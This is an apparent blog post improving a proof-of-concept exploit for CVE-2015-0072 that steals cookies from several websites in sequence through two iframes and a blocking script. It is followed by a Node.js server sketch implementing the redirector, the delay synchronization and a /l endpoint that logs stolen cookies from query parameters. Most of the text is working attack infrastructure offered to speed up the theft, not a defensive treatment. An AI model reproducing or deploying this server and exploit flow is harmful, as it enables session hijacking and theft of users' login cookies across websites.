In the last post I described the CVE-2015-0072 vulnerability and proposed a PoC for sequentially stealing cookies from multiple websites. The downside was the time required: about 5-7 seconds per website.
Today I improved the PoC, cutting the time the exploit needs to about 1 second per website.
- if0: iframe sourcing the target websites
- if1: iframe sourcing a local redirector API and executing the blocking script.
- Execution of the blocking script inside if1, done through an eval().
- Redirect of the if1 location to the same domain as if0.
IMPROVEMENT: SERVER-SIDE SYNCHRONIZATION
- /r/:rand/:id – Redirects to target site id; rand is the internal session identifier.
- /d/:rand/:id – Delays the response for session rand and target site id. The blocking script is implemented on top of this API.
- /l – Logs the query parameters (the actual cookie stealing).
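To make the if0/if1 flow and the three endpoints concrete, here is a dependency-free Node.js sketch of the server side. It is an added example written for this page, not the PoC code from the original post. Two things are assumptions, because the post does not spell them out: the release condition of /d (here, a /d/:rand/:id request is held open until /r/:rand/:id for the same pair has been requested, which is what replaces the fixed 5-7 second sleep), and the target table, which maps numeric ids to placeholder hosts rather than to any real site. The `routeFor`, `makeHandler`, `recordingResponse` and `demo` names are mine.

```javascript
// Added example (not the author's PoC): server-side synchronization for the
// /r, /d and /l endpoints. ASSUMED release rule: /d/:rand/:id is answered only
// once /r/:rand/:id for the same (rand, id) has been hit.

// Constructed target table (placeholder hosts, not the sites from the post).
const TARGETS = {
  0: 'https://target-0.example/',
  1: 'https://target-1.example/',
};

// Per-(rand, id) state: has /r fired yet, and which /d responses are parked on it.
class SessionSync {
  constructor() { this.sessions = new Map(); }
  state(rand, id) {
    const k = `${rand}/${id}`;
    if (!this.sessions.has(k)) this.sessions.set(k, { redirected: false, waiters: [] });
    return this.sessions.get(k);
  }
  // /r: mark the redirect as issued and wake every parked /d caller.
  // Returns how many callers were released.
  redirect(rand, id) {
    const s = this.state(rand, id);
    s.redirected = true;
    const released = s.waiters.splice(0);
    released.forEach((cb) => cb());
    return released.length;
  }
  // /d: run `release` now if /r already fired, otherwise park it.
  // Returns true when released immediately, false when parked.
  delay(rand, id, release) {
    const s = this.state(rand, id);
    if (s.redirected) { release(); return true; }
    s.waiters.push(release);
    return false;
  }
}

// Pure router: pathname -> { kind, rand, id } or null for unknown paths.
function routeFor(pathname) {
  const m = /^\/(r|d)\/([A-Za-z0-9_-]+)\/(\d+)$/.exec(pathname);
  if (m) return { kind: m[1], rand: m[2], id: Number(m[3]) };
  if (pathname === '/l') return { kind: 'l' };
  return null;
}

// Request handler: works with http.createServer or the recording response below.
function makeHandler(sync, log) {
  return (req, res) => {
    const url = new URL(req.url, 'http://localhost');
    const route = routeFor(url.pathname);
    if (!route) { res.writeHead(404); res.end('not found'); return; }
    if (route.kind === 'r') {
      const target = TARGETS[route.id];
      if (!target) { res.writeHead(404); res.end('unknown target'); return; }
      sync.redirect(route.rand, route.id);         // wake the blocking script first ...
      res.writeHead(302, { Location: target });    // ... then send if1 to the target origin
      res.end();
    } else if (route.kind === 'd') {
      // The response is withheld until redirect() fires for this (rand, id).
      sync.delay(route.rand, route.id, () => {
        res.writeHead(200, { 'Content-Type': 'text/plain' });
        res.end('go');
      });
    } else {
      // /l?id=0&c=<document.cookie>: record every query parameter verbatim.
      log.push(Object.fromEntries(url.searchParams));
      res.writeHead(204);
      res.end();
    }
  };
}

// Minimal response recorder so the handler can be exercised without sockets.
function recordingResponse() {
  const r = { status: null, headers: {}, body: null, ended: false };
  r.writeHead = (status, headers) => { r.status = status; r.headers = headers || {}; };
  r.end = (body) => { r.body = body === undefined ? '' : body; r.ended = true; };
  return r;
}

// Offline walk-through of one session with constructed requests:
// the blocking script parks on /d, /r releases it, /l records the stolen value.
function demo() {
  const sync = new SessionSync();
  const log = [];
  const handle = makeHandler(sync, log);
  const d = recordingResponse();
  handle({ url: '/d/abc123/0' }, d);               // if1's blocking request: nothing sent yet
  const parked = !d.ended;
  const r = recordingResponse();
  handle({ url: '/r/abc123/0' }, r);               // redirector hit: 302 plus release of /d
  const l = recordingResponse();
  handle({ url: '/l?id=0&c=session%3Dconstructed' }, l);
  return { parked, dStatus: d.status, dBody: d.body,
           location: r.headers.Location, logged: log[0], logStatus: l.status };
}

// Listen on a real socket only when asked for: node sync.js --serve
if (process.argv.includes('--serve')) {
  const http = require('http');
  http.createServer(makeHandler(new SessionSync(), []))
      .listen(8080, () => console.log('listening on :8080'));
}
```

The point of `SessionSync` is that the wait is event-driven rather than timed: the /d response is released at the moment the redirector is requested, so the per-site cost collapses to the redirect round trip instead of a worst-case sleep. Keying on both rand and id keeps concurrent sessions, or several targets in one session, from releasing each other.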